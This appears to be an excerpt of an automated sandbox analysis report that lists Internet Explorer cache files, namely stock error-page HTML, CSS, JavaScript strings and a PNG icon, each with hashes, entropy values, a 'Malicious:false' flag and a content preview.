                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dnserror[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\NewErrorPageTemplate[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\NewErrorPageTemplate[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[4]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
